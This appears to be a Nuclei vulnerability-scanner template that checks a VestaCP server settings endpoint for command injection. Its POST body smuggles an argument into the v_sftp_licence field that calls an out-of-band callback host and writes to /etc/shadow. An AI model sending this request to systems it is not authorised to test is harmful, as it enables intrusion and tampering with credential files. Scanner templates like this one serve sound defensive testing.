id: vestacp-command-injection

info:
  name: VestaCP Command Injection
  author: Numan Türle
  severity: high
  reference: https://www.exploit-db.com/exploits/49674

http:
  - method: POST
    path:
      - "{{BaseURL}}/edit/server/"
    headers:
      Content-Type: "application/x-www-form-urlencoded"
      Cookie: "PHPSESSID={{cookie}}"
    body: |
      token=149e2b8c201fd88654df6fd694158577&save=save&v_hostname=1338.example.com&v_timezone=Europe%2FIstanbul&v_language=en&v_mail_url=&v_mail_ssl_domain=&v_mysql_url=&v_mysql_password=&v_backup=yes&v_backup_gzip=5&v_backup_dir=%2Fbackup&v_backup_type=ftp&v_backup_host=&v_backup_username=&v_backup_password=&v_backup_bpath=&v_web_ssl_domain=&v_sys_ssl_crt=privatekeyblablabla&v_quota=no&v_firewall=no&v_sftp=yes&v_sftp_licence=1{{interactsh-url}}-o /etc/shadow&v_filemanager=no&v_filemanager_licence=&v_softaculous=yes&save=Save
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  
        words:
          - "dns"
